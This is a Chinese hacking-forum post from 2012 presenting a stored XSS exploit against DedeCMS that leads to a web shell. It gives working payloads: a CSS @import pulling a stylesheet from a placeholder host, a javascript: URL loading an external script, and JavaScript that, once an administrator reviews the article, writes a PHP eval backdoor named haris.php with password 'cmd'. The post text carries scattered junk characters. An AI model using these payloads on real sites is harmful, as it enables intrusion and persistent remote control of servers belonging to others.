找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1745|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
. ?# s  D. y( K. R7 R1 _8 K9 o为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)! a$ S. Y  d9 L. ?* {
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。) N7 O- I) z) Y! z' X2 t
下面说说利用方法。! _0 w& m' t9 `* N0 J
条件有2个:, g" v* E# N/ {0 `! |5 u6 v) m: S
1.开启注册
4 X$ }! ~5 V& [; s! K* Y2.开启投稿( ^: R% Y6 k7 a
注册会员----发表文章
; Z# K2 ^' ~5 C9 A5 Z内容填写:! D4 l; i5 i0 t* U6 G
复制代码6 W2 o: g* \: k- c: S+ B* N5 l7 A/ u
<style>@im\port'\http://xxx.com/xss.css';</style>8 W5 G0 @4 ?8 m$ z4 Y
新建XSS.Css
2 a! q' Z- F2 O8 F( b复制代码: p% d9 ~0 B5 }) S0 q. p1 B4 ?/ {
.body{5 G' g: E1 X" H" Q8 F" N
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }0 t, w. X# j" v& ^1 x8 ?
新建xss.js 内容为
) m0 u# s/ y4 W( L: F4 k复制代码/ B( C' l% s2 s7 J( M; l' N/ ?6 x
1.var request = false;
. {& U; ]0 |  w% l3 N3 f- d2.if(window.XMLHttpRequest) {
# S4 `% S2 j9 j4 U/ U# b7 u( T3.request = new XMLHttpRequest();& _3 d0 Q+ F* s% w5 H
4.if(request.overrideMimeType) {7 I% ?+ U) {$ p9 e/ l
5.request.overrideMimeType('text/xml');
: q8 J8 W3 B# A6.}
0 L6 ]8 A0 }) _9 |; ]6 {' ~9 g! G+ e5 `7.} else if(window.ActiveXObject) {
% A, t9 j* ]2 C2 s8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];( m) R! c3 Q; l
9.for(var i=0; i<versions.length; i++) {
( S% s: V2 w: E7 V# R+ w/ Z10.try {3 \1 {/ n7 `1 A
11.request = new ActiveXObject(versions);
6 z& r: P% {: R0 O# Y12.} catch(e) {}
8 W* r! K: R  z13.}( o- ]2 f4 G2 @3 [" B  i3 F
14.}
7 R+ C! |; I2 _! p0 @15.xmlhttp=request;+ U* U; e# r4 h6 a( i$ o
16.function getFolder( url ){
- L" l0 i  t4 S" y2 k, a8 W/ N3 o17. obj = url.split('/')
& r1 `! b/ Q8 K0 |8 P0 |7 ?' W18. return obj[obj.length-2]7 }2 ~' H  `7 C! G0 j( `4 \
19.}" z# b+ G! p; H( g2 G/ x
20.oUrl = top.location.href;
$ Q1 R$ A3 N; B; O* B+ c21.u = getFolder(oUrl);0 b, ~8 b+ T1 }
22.add_admin();
. ^) |' }4 O# X4 \$ u. U) a& M23.function add_admin(){: J" |! r* p, t+ e) Q  _
24.var url= "/"+u+"/sys_sql_query.php";8 f, j: P5 N% t. q( z  c- I
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";% s- U5 A" G8 M6 f1 @# a
26.xmlhttp.open("POST", url, true);
7 x' k% x& e- R, F& d27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");5 |1 ~2 w* b( r1 ]$ }- y7 E9 \# N
28.xmlhttp.setRequestHeader("Content-length", params.length);
1 C7 {) v& k9 O- ]) P29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");, ^& k9 _' F( }) B$ G
30.xmlhttp.send(params);
2 ?# m' l6 |  n% y. X9 ]31.}
8 B- }6 {: d! E: E( g, @# D当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表